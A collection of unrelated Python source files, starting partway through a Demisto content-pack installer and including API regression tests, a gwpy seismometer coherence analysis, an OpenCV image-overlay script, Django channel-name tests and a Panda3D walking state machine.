method='POST',
body=[pack_data],
accept='application/json',
_request_timeout=None
)
if 200 <= status_code < 300:
dependencies_data = []
dependants_ids = [pack_id]
            response_data = ast.literal_eval(response_data).get('dependencies', [])
            create_dependencies_data_structure(response_data, dependants_ids, dependencies_data, dependants_ids)
dependencies_str = ', '.join([dep['id'] for dep in dependencies_data])
if dependencies_data:
message = 'Found the following dependencies for pack {}:\n{}\n'.format(pack_id, dependencies_str)
prints_manager.add_print_job(message, print_color, thread_index, LOG_COLORS.GREEN)
prints_manager.execute_thread_prints(thread_index)
return dependencies_data
else:
result_object = ast.literal_eval(response_data)
msg = result_object.get('message', '')
err_msg = 'Failed to get pack {} dependencies - with status code {}\n{}\n'.format(pack_id, status_code, msg)
raise Exception(err_msg)
except Exception as e:
err_msg = 'The request to get pack {} dependencies has failed. Reason:\n{}\n'.format(pack_id, str(e))
prints_manager.add_print_job(err_msg, print_color, thread_index, LOG_COLORS.RED)
prints_manager.execute_thread_prints(thread_index)
lock.acquire()
global SUCCESS_FLAG
SUCCESS_FLAG = False
lock.release()
def search_pack(client, prints_manager, pack_display_name, thread_index, lock):
""" Make a pack search request.
Args:
client (demisto_client): The configured client to use.
prints_manager (ParallelPrintsManager): Print manager object.
pack_display_name (string): The pack display name.
thread_index (int): the thread index.
lock (Lock): A lock object.
Returns:
(dict): Returns the pack data if found, or empty dict otherwise.
"""
try:
# make the search request
response_data, status_code, _ = demisto_client.generic_request_func(client,
path='/contentpacks/marketplace/search',
method='POST',
body={"packsQuery": pack_display_name},
accept='application/json',
_request_timeout=None)
if 200 <= status_code < 300:
result_object = ast.literal_eval(response_data)
search_results = result_object.get('packs', [])
pack_data = get_pack_data_from_results(search_results, pack_display_name)
if pack_data:
print_msg = 'Found pack {} in bucket!\n'.format(pack_display_name)
prints_manager.add_print_job(print_msg, print_color, thread_index, LOG_COLORS.GREEN)
prints_manager.execute_thread_prints(thread_index)
return pack_data
else:
print_msg = 'Did not find pack {} in bucket.\n'.format(pack_display_name)
prints_manager.add_print_job(print_msg, print_color, thread_index, LOG_COLORS.RED)
prints_manager.execute_thread_prints(thread_index)
raise Exception(print_msg)
else:
result_object = ast.literal_eval(response_data)
msg = result_object.get('message', '')
err_msg = 'Pack {} search request failed - with status code {}\n{}'.format(pack_display_name,
status_code, msg)
raise Exception(err_msg)
except Exception as e:
err_msg = 'The request to search pack {} has failed. Reason:\n{}'.format(pack_display_name, str(e))
prints_manager.add_print_job(err_msg, print_color, thread_index, LOG_COLORS.RED)
lock.acquire()
global SUCCESS_FLAG
SUCCESS_FLAG = False
lock.release()
def install_packs(client, host, prints_manager, thread_index, packs_to_install, request_timeout=999999):
""" Make a packs installation request.
Args:
client (demisto_client): The configured client to use.
host (str): The server URL.
prints_manager (ParallelPrintsManager): Print manager object.
thread_index (int): the thread index.
packs_to_install (list): A list of the packs to install.
request_timeout (int): Timeout settings for the installation request.
"""
request_data = {
'packs': packs_to_install,
'ignoreWarnings': True
}
packs_to_install_str = ', '.join([pack['id'] for pack in packs_to_install])
message = 'Installing the following packs in server {}:\n{}'.format(host, packs_to_install_str)
prints_manager.add_print_job(message, print_color, thread_index, LOG_COLORS.GREEN, include_timestamp=True)
prints_manager.execute_thread_prints(thread_index)
# make the pack installation request
try:
response_data, status_code, _ = demisto_client.generic_request_func(client,
path='/contentpacks/marketplace/install',
method='POST',
body=request_data,
accept='application/json',
_request_timeout=request_timeout)
if 200 <= status_code < 300:
message = 'Packs were successfully installed!\n'
prints_manager.add_print_job(message, print_color, thread_index, LOG_COLORS.GREEN, include_timestamp=True)
else:
result_object = ast.literal_eval(response_data)
message = result_object.get('message', '')
err_msg = f'Failed to install packs - with status code {status_code}\n{message}\n'
prints_manager.add_print_job(err_msg, print_error, thread_index, include_timestamp=True)
raise Exception(err_msg)
except Exception as e:
err_msg = f'The request to install packs has failed. Reason:\n{str(e)}\n'
prints_manager.add_print_job(err_msg, print_error, thread_index, include_timestamp=True)
global SUCCESS_FLAG
SUCCESS_FLAG = False
finally:
prints_manager.execute_thread_prints(thread_index)
def search_pack_and_its_dependencies(client, prints_manager, pack_id, packs_to_install,
installation_request_body, thread_index, lock):
""" Searches for the pack of the specified file path, as well as its dependencies,
and updates the list of packs to be installed accordingly.
Args:
client (demisto_client): The configured client to use.
prints_manager (ParallelPrintsManager): A prints manager object.
pack_id (str): The id of the pack to be installed.
packs_to_install (list) A list of the packs to be installed in this iteration.
installation_request_body (list): A list of packs to be installed, in the request format.
thread_index (int): the thread index.
lock (Lock): A lock object.
"""
pack_data = []
if pack_id not in packs_to_install:
pack_display_name = get_pack_display_name(pack_id)
if pack_display_name:
pack_data = search_pack(client, prints_manager, pack_display_name, thread_index, lock)
if pack_data:
dependencies = get_pack_dependencies(client, prints_manager, pack_data, thread_index, lock)
current_packs_to_install = [pack_data]
current_packs_to_install.extend(dependencies)
lock.acquire()
for pack in current_packs_to_install:
if pack['id'] not in packs_to_install:
packs_to_install.append(pack['id'])
installation_request_body.append(pack)
lock.release()
def add_pack_to_installation_request(pack_id, installation_request_body):
metadata_path = os.path.join(PACKS_FULL_PATH, pack_id, PACK_METADATA_FILE)
with open(metadata_path, 'r') as json_file:
pack_metadata = json.load(json_file)
version = pack_metadata.get('currentVersion')
installation_request_body.append({
'id': pack_id,
'version': version
})
def install_all_content_packs(client, host, prints_manager, thread_index=0):
all_packs = []
for pack_id in os.listdir(PACKS_FULL_PATH):
if pack_id not in IGNORED_FILES and pack_id != 'Silverfort': # todo: remove silverfort when fixed
add_pack_to_installation_request(pack_id, all_packs)
install_packs(client, host, prints_manager, thread_index, all_packs)
def upload_zipped_packs(client, host, prints_manager, thread_index, pack_path):
""" Install packs from zip file.
Args:
client (demisto_client): The configured client to use.
host (str): The server URL.
prints_manager (ParallelPrintsManager): Print manager object.
thread_index (int): the index (for prints_manager).
pack_path (str): path to pack zip.
"""
header_params = {
'Content-Type': 'multipart/form-data'
}
file_path = os.path.abspath(pack_path)
files = {'file': file_path}
message = 'Making "POST" request to server {} - to install all packs from file {}'.format(host, pack_path)
prints_manager.add_print_job(message, print_color, thread_index, LOG_COLORS.GREEN)
prints_manager.execute_thread_prints(thread_index)
# make the pack installation request
try:
response_data, status_code, _ = client.api_client.call_api(resource_path='/contentpacks/installed/upload',
method='POST',
header_params=header_params, files=files)
if 200 <= status_code < 300:
message = 'All packs from {} were successfully installed!\n'.format(pack_path)
prints_manager.add_print_job(message, print_color, thread_index, LOG_COLORS.GREEN)
prints_manager.execute_thread_prints(thread_index)
else:
result_object = ast.literal_eval(response_data)
message = result_object.get('message', '')
err_msg = 'Failed to install packs - with status code {}\n{}\n'.format(status_code, message)
raise Exception(err_msg)
except Exception as e:
err_msg = 'The request to install packs has failed. Reason:\n{}\n'.format(str(e))
raise Exception(err_msg)
def search_and_install_packs_and_their_dependencies(pack_ids, client, prints_manager, thread_index=0):
""" Searches for the packs from the specified list, searches their dependencies, and then installs them.
Args:
pack_ids (list): A list of the pack ids to search and install.
client (demisto_client): The client to connect to.
prints_manager (ParallelPrintsManager): A prints manager object.
thread_index (int): the thread index.
Returns (list, bool):
        A list of the installed packs' ids, or an empty list if none were found.
A flag that indicates if the operation succeeded or not.
"""
host = client.api_client.configuration.host
msg = 'Starting to search and install packs in server: {}\n'.format(host)
prints_manager.add_print_job(msg, print_color, thread_index, LOG_COLORS.GREEN)
prints_manager.execute_thread_prints(thread_index)
packs_to_install = [] # we save all the packs we want to install, to avoid duplications
installation_request_body = [] # the packs to install, in the request format
threads_list = []
lock = Lock()
for pack_id in pack_ids:
thread = Thread(target=search_pack_and_its_dependencies,
kwargs={'client': client,
'prints_manager': prints_manager,
'pack_id': pack_id,
'packs_to_install': packs_to_install,
'installation_request_body': installation_request_body,
'thread_index': thread_index,
'lock': lock})
threads_list.append(thread)
run_threads_list(threads_list)
install_packs(client, host, prints_manager, thread_index, installation_request_body)
return packs_to_install, SUCCESS_FLAG
|
import json
import requests
def test_files_get_all(regtest, db, url, file):
r = requests.get(url + '/files')
f = r.json()
f['data']['files'][0]['timestamp'] = None
regtest.write(str(json.dumps(f, sort_keys=True)))
def test_files_get_filter(regtest, db, url, file):
r = requests.get(url + '/files?filter[name]=' + file['name'])
f = r.json()
f['data']['files'][0]['timestamp'] = None
regtest.write(str(json.dumps(f, sort_keys=True)))
def test_files_get_filter_1(regtest, db, url):
r = requests.get(url + '/files?filter[name]=abcd')
regtest.write(r.text)
def test_file_hex_get_missing(regtest, db, url):
r = requests.get(url + '/file/abcd/hex')
regtest.write(r.text)
def test_file_hex_get(regtest, db, url, file):
r = requests.get(url + '/file/' + file['sha256_digest'] + '/hex')
regtest.write(r.text)
def test_file_get_missing(regtest, db, url):
r = requests.get(url + '/file')
regtest.write(r.text)
def test_file_get_missing_1(regtest, db, url):
r = requests.get(url + '/file/abcd')
regtest.write(r.text)
def test_file_get(regtest, db, url, file):
r = requests.get(url + '/file/' + file['sha256_digest'])
f = r.json()
f['data']['file']['timestamp'] = None
regtest.write(str(json.dumps(f, sort_keys=True)))
def test_file_patch_missing(regtest, db, url):
r = requests.patch(url + '/file/abcd')
regtest.write(r.text)
def test_file_patch_missing_1(regtest, db, url, file):
r = requests.patch(url + '/file/' + file['sha256_digest'])
regtest.write(r.text)
def test_file_patch(regtest, db, url, file):
data = '{"description": "abcd"}'
r = requests.patch(url + '/file/' + file['sha256_digest'], data=data)
f = r.json()
f['data']['file']['timestamp'] = None
regtest.write(str(json.dumps(f, sort_keys=True)))
def test_file_put_missing(regtest, db, url):
r = requests.put(url + '/file/abcd')
regtest.write(r.text)
def test_file_put_missing_1(regtest, db, url, file):
r = requests.put(url + '/file/' + file['sha256_digest'])
regtest.write(r.text)
def test_file_put(regtest, db, url, file):
data = '{"name": "abcd"}'
r = requests.put(url + '/file/' + file['sha256_digest'], data=data)
f = r.json()
f['data']['file']['timestamp'] = None
regtest.write(str(json.dumps(f, sort_keys=True)))
def test_file_delete_missing(regtest, db, url):
r = requests.delete(url + '/file/abcd')
regtest.write(r.text)
def test_file_delete(regtest, db, url, file):
r = requests.delete(url + '/file/' + file['sha256_digest'])
regtest.write(str(r.text))
regtest.write(str(r.status_code))
|
import numpy as np
import matplotlib.pyplot as plt
from gwpy.timeseries import TimeSeriesDict
from gwpy.time import tconvert
import re
import warnings
warnings.filterwarnings('ignore')
#start = tconvert('Jul 20 2019 19:00:00 JST')
end = tconvert('Jul 20 2019 21:25:00 JST')
start = end - 2**11
channels = ['K1:PEM-SEIS_EXV_GND_X_OUT_DQ',
'K1:PEM-SEIS_IXV_GND_X_OUT_DQ',
'K1:GIF-X_STRAIN_IN1_DQ',
'K1:ALS-X_PDH_SLOW_DAQ_OUT_DQ'
]
data = TimeSeriesDict.fetch(channels,start,end,host='10.68.10.122',port=8088,
verbose=True,pad=0.0)
exv_x = data.values()[0]
ixv_x = data.values()[1]
gif = data.values()[2]*((532e-9/2)/(2.0*np.pi))/1500*3000.0*1e6 # um
pdh = data.values()[3]
gif = gif.resample(512)
pdh = pdh.resample(512)
# Timeseries
plot = pdh.plot(label=pdh.name.replace('_',' '),ylabel='Count?')
ax = plot.gca()
ax.legend()
plot.savefig('huge.png')
plot.close()
# differential motion of the seismometers
diff = exv_x - ixv_x
comm = exv_x + ixv_x
# coherence
csd_gif_diff = gif.csd(diff, fftlength=2**6, overlap=2**5) # 2**7 = 128
csd_pdh_gif = pdh.csd(gif, fftlength=2**6, overlap=2**5) # 2**7 = 128
csd_pdh_diff = pdh.csd(diff, fftlength=2**6, overlap=2**5) # 2**7 = 128
csd_pdh_comm = pdh.csd(comm, fftlength=2**6, overlap=2**5) # 2**7 = 128
gif = gif.asd(fftlength=2**6, overlap=2**5)
diff = diff.asd(fftlength=2**6, overlap=2**5)
comm = comm.asd(fftlength=2**6, overlap=2**5)
pdh = pdh.asd(fftlength=2**6, overlap=2**5)
coh_gif_diff = csd_gif_diff/gif/(diff*1j)
coh_pdh_gif = csd_pdh_gif/pdh/gif
coh_pdh_diff = csd_pdh_diff/pdh/(diff*1j)
coh_pdh_comm = csd_pdh_comm/pdh/(comm*1j)
comm = comm/(2.0*np.pi*comm.frequencies.value)
diff = diff/(2.0*np.pi*diff.frequencies.value)
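# The seismometer ASDs are divided by 2*pi*f above, presumably to convert the velocity
# spectra to displacement, matching the 'Displacement' label on the plot below.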
# plot Coherence
fig, (ax0,ax1,ax2) = plt.subplots(3,1,figsize=(10,10))
ax0.loglog(gif,label='GIF',color='k')
ax0.loglog(pdh,label='PDH (um?)',color='b',linestyle='-')
ax0.loglog(diff,label='Seis Diff',color='r',linestyle='-')
ax0.loglog(comm,label='Seis Comm',color='r',linestyle='--')
ax0.legend(fontsize=15,loc='upper right')
ax0.set_ylabel('Diplacement [um/rtHz]')
ax0.set_ylim(1e-3,1e1)
ax0.set_xlim(3e-2, 10)
ax1.semilogx(coh_gif_diff.abs()**2,label='GIF vs Seis Diff',color='g',linestyle='-')
ax1.semilogx(coh_pdh_gif.abs()**2,label='PDH vs GIF',color='k',linestyle='-')
ax1.semilogx(coh_pdh_diff.abs()**2,label='PDH vs Diffs',color='b',linestyle='-')
ax1.semilogx(coh_pdh_comm.abs()**2,label='PDH vs Comms',color='b',linestyle='--')
ax1.set_xlabel('Frequency [Hz]')
ax1.set_ylabel('Magnitude-Squared \n Coherence')
ax1.set_ylim(0, 1)
ax1.set_xlim(3e-2, 10)
ax1.legend(fontsize=15,loc='upper right')
ax2.semilogx(coh_gif_diff.angle().rad2deg(),label='GIF vs Seis Diff',color='g',linestyle='-')
ax2.semilogx(coh_pdh_gif.angle().rad2deg(),label='PDH vs GIF',color='k',linestyle='-')
ax2.semilogx(coh_pdh_diff.angle().rad2deg(),label='PDH vs Diffs',color='b',linestyle='-')
ax2.semilogx(coh_pdh_comm.angle().rad2deg(),label='PDH vs Comms',color='b',linestyle='--')
ax2.set_ylim(-180, 180)
ax2.set_yticks(range(-180, 181, 90))
ax2.set_xlim(3e-2, 10)
ax2.legend(fontsize=15,loc='upper right')
ax2.set_ylabel('Phase [Deg.]')
plt.savefig('hoge.png')
plt.close()
|
# Copyright 2021 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
General constants.
"""
# isort: STDLIB
from enum import IntEnum
class PoolMaintenanceErrorCode(IntEnum):
"""
Maintenance error codes for the pool.
"""
NO_IPC_REQUESTS = 1
NO_POOL_CHANGES = 2
READ_ONLY = 3
def __str__(self):
return "EM%s" % str(self.value).zfill(3)
@staticmethod
def from_str(code_str):
"""
Discover the code, if any, from the code string.
:returns: the code if it finds a match, otherwise None
:rtype: PoolMaintenanceErrorCode or NoneType
"""
for code in PoolMaintenanceErrorCode:
if code_str == str(code):
return code
return None
def explain(self):
"""
Return an explanation of the error return code.
"""
if self is PoolMaintenanceErrorCode.NO_IPC_REQUESTS:
return (
"The pool will return an error on any IPC request that could "
"cause a change in the pool state, for example, a request to "
"rename a filesystem. It will still be able to respond to "
"purely informational requests."
)
if self is PoolMaintenanceErrorCode.NO_POOL_CHANGES:
return (
"The pool is unable to manage itself by reacting to events, "
"such as devicemapper events, that might require it to take "
"any maintenance operations."
)
if self is PoolMaintenanceErrorCode.READ_ONLY: # pragma: no cover
return "The pool is in read-only mode."
assert False, "impossible error code reached" # pragma: no cover
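# Illustrative usage (not part of the original module):
#   str(PoolMaintenanceErrorCode.NO_IPC_REQUESTS) == "EM001"
#   PoolMaintenanceErrorCode.from_str("EM001") is PoolMaintenanceErrorCode.NO_IPC_REQUESTS
#   PoolMaintenanceErrorCode.from_str("EM999") is None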
|
import unittest
class FileUtilsTestCase(unittest.TestCase):
def test1(self):
print("test1")
self.assertEqual(1, 1)
if __name__ == '__main__':
unittest.main()
|
# Big data analysis, deep learning, machine learning
import random
# seed: random numbers are generated from the given number (the generated sequence does not change between runs)
random.seed(999)
# randrange(n) yields integers 0 to n-1, so randrange(100) gives 0~99; the comprehension draws 10 of them
a=[random.randrange(100) for _ in range(10)]
print(a)
# data -> training data (about 70% of the data) / test data (30%) -> model -> feed the test data -> evaluate the model -> feedback based on the evaluation
# when the algorithm (and hence the model) changes, the training and test data must stay the same, otherwise the results cannot be compared
# the train/test split is random, so a seed is used to make the random numbers, and therefore the split, reproducible
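# Illustration (not part of the original notes): a reproducible 70/30 split with a fixed seed,
# assuming `data` is a plain Python list:
#   random.seed(42); random.shuffle(data); cut = int(len(data) * 0.7)
#   train, test = data[:cut], data[cut:]   # the same split on every run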
print([i for i in range(10)])  # prints the numbers 0..9 as a list
print([i for i in a])  # prints the random list a
#a=[86, 10, 72, 73, 68, 62, 61, 16, 82, 40]
print([i for i in a if i % 2])  # keeps only the odd values (where i % 2 is truthy)
print([i for i in a if i % 2][::-1])  # reverse the output
print([i for i in a[::-1] if i % 2])  # iterate over a in reverse
print([i for i in reversed(a) if i % 2])
a1=[random.randrange(100) for _ in range(10)]
a2=[random.randrange(100) for _ in range(10)]
a3=[random.randrange(100) for _ in range(10)]
b=[a1,a2,a3]
print(b)
print(sum([1,3,5]))
print([sum(i) for i in b])
print(sum([sum(i) for i in b]))
print([0 for i in b for j in i])  # flattening: one entry per element of the nested lists, i.e. a 1-D list
# dimensionality reduction (e.g. PCA) is different: the data is transformed, so the values themselves change
print([i for i in b])
print([j for i in b for j in i if j % 2])
print([[j for j in i] for i in b])
print([[j for j in i if j % 2] for i in b])  # with nested comprehensions, the right-most for is the innermost loop
print("="*50)
print(b)
print([i for i in b[::-1]])  # reverse the rows
print([[j for j in i[::-1]] for i in b[::-1]])  # reverse both the rows and the columns
print(2**1000)
print(str(2**1000))
print(len(str(2**1000)))
# Compute the sum of the digits of 2**1000.
d=0
a= str(2**1000)
b=[i for i in a]
print(b)
print(len(b))
for i in b:
d+=int(i)
print(d)
print(sum([int(i) for i in str(2**1000)]))
s='707'
print(s.count('7'))  # meaning there are two 7s in s
# Count the number of 7s in the numbers 1 to 100000.
a=[str(i) for i in range(1,100001)]
print("_".join(a).count('7'))
# maria = {'kor': 94, 'eng': 91, 'math': 89, 'sci': 83}
# Print the average of the scores stored in the maria dictionary.
import numpy as np
maria={'kor':94,'eng':91,'math':89,'sci':83}
a=np.mean([j for j in maria.values()])
print(a)
# For a natural number n, define d(n) as n plus the sum of its digits.
# For example d(91) = 9 + 1 + 91 = 101.
# n is then called a generator of d(n); 91 is a generator of 101.
# Some numbers have more than one generator: 101 is generated by both 91 and 100.
# Conversely, numbers with no generator are called self numbers.
# For example 1, 3, 5, 7, 9, 20, 31 are self numbers.
# Compute the sum of all self numbers that are >= 1 and < 5000.
n=[[i for i in str(b)] for b in range(1,5000)]
for b in range(1,5000):
    n[b-1].append(str(b))
# d(b) for every b: the sum of each row, i.e. the digits of b plus b itself
m=[sum(map(int,i)) for i in n]
print(sum(set(range(1,5000))-set(m)))
#print(m)
print(n)
# i=567
# for t in str(i):
# print(int(t)+1)
#
# set(range(1,5))-set(range(1,3))  # {1,2,3,4}-{1,2} = {3,4}
|
import cv2 as cv
import numpy as np
import os
import sys
os.chdir(sys.path[0])
coeff = 2
target = cv.imread('resources/angel.jpg')
tgt_shape = np.flip(np.shape(target)[0:2])
target = cv.resize(target, (int(tgt_shape[0]/coeff), int(tgt_shape[1]/coeff)))
replacement = cv.imread('resources/book_template.jpg')
replacement = cv.resize(replacement, (int(tgt_shape[0]/coeff), int(tgt_shape[1]/coeff)))
video = cv.VideoCapture('resources/angel.mp4')
orb = cv.ORB_create()
bf = cv.BFMatcher.create(normType=cv.NORM_HAMMING, crossCheck=True)
tgt_pts, tgt_desc = orb.detectAndCompute(target, None)
match_out = cv.VideoWriter(f'results/2-matches.avi', cv.VideoWriter_fourcc('M', 'J', 'P', 'G'), 30, (1963, 826))
add_out = cv.VideoWriter(f'results/2-superimposed.avi', cv.VideoWriter_fourcc('M', 'J', 'P', 'G'), 30, (960, 540))
def readFrame():
    ret, frame = video.read()
    if ret:
        shape = np.flip(np.shape(frame)[0:2])
        frame = cv.resize(frame, (int(shape[0]/coeff), int(shape[1]/coeff)))
    return ret, frame
while True:
k = cv.waitKey(1) & 0xff
if k == 27:
break
ret, frame = readFrame()
if ret is not True:
break
else:
vid_pts, vid_desc = orb.detectAndCompute(frame, None)
matches = bf.match(tgt_desc, vid_desc)
matches = sorted(matches, key=lambda x:x.distance)
pt0 = []
pt1 = []
for i in range(15):
pt0.append(tgt_pts[matches[i].queryIdx].pt)
pt1.append(vid_pts[matches[i].trainIdx].pt)
pt0 = np.asarray(pt0).reshape(-1, 1, 2)
pt1 = np.asarray(pt1).reshape(-1, 1, 2)
h, status = cv.findHomography(pt0, pt1)
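        # Warp the replacement image into the video frame with the estimated homography,
        # crop it to the frame size, then composite: the inverted binary mask blanks the
        # destination region (frame & mask) before the warped pixels are OR-ed in.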
warp_out = cv.warpPerspective(replacement, h, (replacement.shape[1], replacement.shape[0]))
warp_crop = warp_out[:frame.shape[0], :frame.shape[1]]
warp_mask = cv.cvtColor(cv.threshold(cv.cvtColor(warp_crop, cv.COLOR_BGR2GRAY), 1, 255, cv.THRESH_BINARY_INV)[1], cv.COLOR_GRAY2BGR)
match_frame = cv.drawMatches(target, tgt_pts, frame, vid_pts, matches[:20], None, flags=2)
add_frame = frame & warp_mask
add_frame = add_frame | warp_crop
cv.imshow('match frame', match_frame)
cv.imshow('add frame', add_frame)
match_out.write(match_frame)
add_out.write(add_frame)
match_out.release()
add_out.release()
cv.destroyAllWindows()
exit()
|
from django.urls import reverse
from .base import AuthenticatedAPITestCase
from ..models import OffTopicChannelName
class UnauthenticatedTests(AuthenticatedAPITestCase):
def setUp(self):
super().setUp()
self.client.force_authenticate(user=None)
def test_cannot_read_off_topic_channel_name_list(self):
"""Return a 401 response when not authenticated."""
url = reverse('api:bot:offtopicchannelname-list')
response = self.client.get(url)
self.assertEqual(response.status_code, 401)
def test_cannot_read_off_topic_channel_name_list_with_random_item_param(self):
"""Return a 401 response when `random_items` provided and not authenticated."""
url = reverse('api:bot:offtopicchannelname-list')
response = self.client.get(f'{url}?random_items=no')
self.assertEqual(response.status_code, 401)
class EmptyDatabaseTests(AuthenticatedAPITestCase):
def test_returns_empty_object(self):
"""Return empty list when no names in database."""
url = reverse('api:bot:offtopicchannelname-list')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json(), [])
def test_returns_empty_list_with_get_all_param(self):
"""Return empty list when no names and `random_items` param provided."""
url = reverse('api:bot:offtopicchannelname-list')
response = self.client.get(f'{url}?random_items=5')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json(), [])
def test_returns_400_for_bad_random_items_param(self):
"""Return error message when passing not integer as `random_items`."""
url = reverse('api:bot:offtopicchannelname-list')
response = self.client.get(f'{url}?random_items=totally-a-valid-integer')
self.assertEqual(response.status_code, 400)
self.assertEqual(response.json(), {
'random_items': ["Must be a valid integer."]
})
def test_returns_400_for_negative_random_items_param(self):
"""Return error message when passing negative int as `random_items`."""
url = reverse('api:bot:offtopicchannelname-list')
response = self.client.get(f'{url}?random_items=-5')
self.assertEqual(response.status_code, 400)
self.assertEqual(response.json(), {
'random_items': ["Must be a positive integer."]
})
class ListTests(AuthenticatedAPITestCase):
@classmethod
def setUpTestData(cls):
cls.test_name = OffTopicChannelName.objects.create(name='lemons-lemonade-stand', used=False)
cls.test_name_2 = OffTopicChannelName.objects.create(name='bbq-with-bisk', used=True)
def test_returns_name_in_list(self):
"""Return all off-topic channel names."""
url = reverse('api:bot:offtopicchannelname-list')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertEqual(
response.json(),
[
self.test_name.name,
self.test_name_2.name
]
)
def test_returns_single_item_with_random_items_param_set_to_1(self):
"""Return not-used name instead used."""
url = reverse('api:bot:offtopicchannelname-list')
response = self.client.get(f'{url}?random_items=1')
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.json()), 1)
self.assertEqual(response.json(), [self.test_name.name])
def test_running_out_of_names_with_random_parameter(self):
"""Reset names `used` parameter to `False` when running out of names."""
url = reverse('api:bot:offtopicchannelname-list')
response = self.client.get(f'{url}?random_items=2')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json(), [self.test_name.name, self.test_name_2.name])
class CreationTests(AuthenticatedAPITestCase):
def setUp(self):
super().setUp()
url = reverse('api:bot:offtopicchannelname-list')
self.name = "abcdefghijklmnopqrstuvwxyz-0123456789"
response = self.client.post(f'{url}?name={self.name}')
self.assertEqual(response.status_code, 201)
def test_returns_201_for_unicode_chars(self):
"""Accept all valid characters."""
url = reverse('api:bot:offtopicchannelname-list')
names = (
'𝖠𝖡𝖢𝖣𝖤𝖥𝖦𝖧𝖨𝖩𝖪𝖫𝖬𝖭𝖮𝖯𝖰𝖱𝖲𝖳𝖴𝖵𝖶𝖷𝖸𝖹',
'ǃ?’',
)
for name in names:
response = self.client.post(f'{url}?name={name}')
self.assertEqual(response.status_code, 201)
def test_returns_400_for_missing_name_param(self):
"""Return error message when name not provided."""
url = reverse('api:bot:offtopicchannelname-list')
response = self.client.post(url)
self.assertEqual(response.status_code, 400)
self.assertEqual(response.json(), {
'name': ["This query parameter is required."]
})
def test_returns_400_for_bad_name_param(self):
"""Return error message when invalid characters provided."""
url = reverse('api:bot:offtopicchannelname-list')
invalid_names = (
'space between words',
'ABCDEFGHIJKLMNOPQRSTUVWXYZ',
'!?\'@#$%^&*()',
)
for name in invalid_names:
response = self.client.post(f'{url}?name={name}')
self.assertEqual(response.status_code, 400)
self.assertEqual(response.json(), {
'name': ["Enter a valid value."]
})
class DeletionTests(AuthenticatedAPITestCase):
@classmethod
def setUpTestData(cls):
cls.test_name = OffTopicChannelName.objects.create(name='lemons-lemonade-stand')
cls.test_name_2 = OffTopicChannelName.objects.create(name='bbq-with-bisk')
def test_deleting_unknown_name_returns_404(self):
"""Return 404 response when trying to delete unknown name."""
url = reverse('api:bot:offtopicchannelname-detail', args=('unknown-name',))
response = self.client.delete(url)
self.assertEqual(response.status_code, 404)
def test_deleting_known_name_returns_204(self):
"""Return 204 response when deleting was successful."""
url = reverse('api:bot:offtopicchannelname-detail', args=(self.test_name.name,))
response = self.client.delete(url)
self.assertEqual(response.status_code, 204)
def test_name_gets_deleted(self):
"""Name gets actually deleted."""
url = reverse('api:bot:offtopicchannelname-detail', args=(self.test_name_2.name,))
response = self.client.delete(url)
self.assertEqual(response.status_code, 204)
url = reverse('api:bot:offtopicchannelname-list')
response = self.client.get(url)
self.assertNotIn(self.test_name_2.name, response.json())
|
from pandac.PandaModules import *
from direct.task.Task import Task
from direct.directnotify import DirectNotifyGlobal
from direct.fsm import StateData
from direct.fsm import ClassicFSM, State
class Walk(StateData.StateData):
notify = DirectNotifyGlobal.directNotify.newCategory('Walk')
def __init__(self, doneEvent):
StateData.StateData.__init__(self, doneEvent)
self.fsm = ClassicFSM.ClassicFSM('Walk', [State.State('off', self.enterOff, self.exitOff, ['walking', 'swimming', 'slowWalking']),
State.State('walking', self.enterWalking, self.exitWalking, ['swimming', 'slowWalking']),
State.State('swimming', self.enterSwimming, self.exitSwimming, ['walking', 'slowWalking']),
State.State('slowWalking', self.enterSlowWalking, self.exitSlowWalking, ['walking', 'swimming'])], 'off', 'off')
self.fsm.enterInitialState()
self.IsSwimSoundAudible = 0
self.swimSoundPlaying = 0
def load(self):
pass
def unload(self):
del self.fsm
def enter(self, slowWalk = 0):
base.localAvatar.startPosHprBroadcast()
base.localAvatar.startBlink()
base.localAvatar.attachCamera()
shouldPush = 1
if len(base.localAvatar.cameraPositions) > 0:
shouldPush = not base.localAvatar.cameraPositions[base.localAvatar.cameraIndex][4]
base.localAvatar.startUpdateSmartCamera(shouldPush)
base.localAvatar.showName()
base.localAvatar.collisionsOn()
base.localAvatar.startGlitchKiller()
base.localAvatar.enableAvatarControls()
def exit(self):
self.fsm.request('off')
self.ignore(base.JUMP)
base.localAvatar.disableAvatarControls()
base.localAvatar.stopUpdateSmartCamera()
base.localAvatar.stopPosHprBroadcast()
base.localAvatar.stopBlink()
base.localAvatar.detachCamera()
base.localAvatar.stopGlitchKiller()
base.localAvatar.collisionsOff()
base.localAvatar.controlManager.placeOnFloor()
def enterOff(self):
pass
def exitOff(self):
pass
def enterWalking(self):
if base.localAvatar.hp > 0:
base.localAvatar.startTrackAnimToSpeed()
base.localAvatar.setWalkSpeedNormal()
base.localAvatar.applyBuffs()
else:
self.fsm.request('slowWalking')
def exitWalking(self):
base.localAvatar.stopTrackAnimToSpeed()
def setSwimSoundAudible(self, IsSwimSoundAudible):
self.IsSwimSoundAudible = IsSwimSoundAudible
if IsSwimSoundAudible == 0 and self.swimSoundPlaying:
self.swimSound.stop()
self.swimSoundPlaying = 0
def enterSwimming(self, swimSound):
base.localAvatar.setWalkSpeedNormal()
base.localAvatar.applyBuffs()
self.swimSound = swimSound
self.swimSoundPlaying = 0
base.localAvatar.b_setAnimState('swim', base.localAvatar.animMultiplier)
base.localAvatar.startSleepSwimTest()
taskMgr.add(self.__swim, 'localToonSwimming')
def exitSwimming(self):
taskMgr.remove('localToonSwimming')
self.swimSound.stop()
del self.swimSound
self.swimSoundPlaying = 0
base.localAvatar.stopSleepSwimTest()
def __swim(self, task):
speed = base.mouseInterfaceNode.getSpeed()
if speed == 0 and self.swimSoundPlaying:
self.swimSoundPlaying = 0
self.swimSound.stop()
elif speed > 0 and self.swimSoundPlaying == 0 and self.IsSwimSoundAudible:
self.swimSoundPlaying = 1
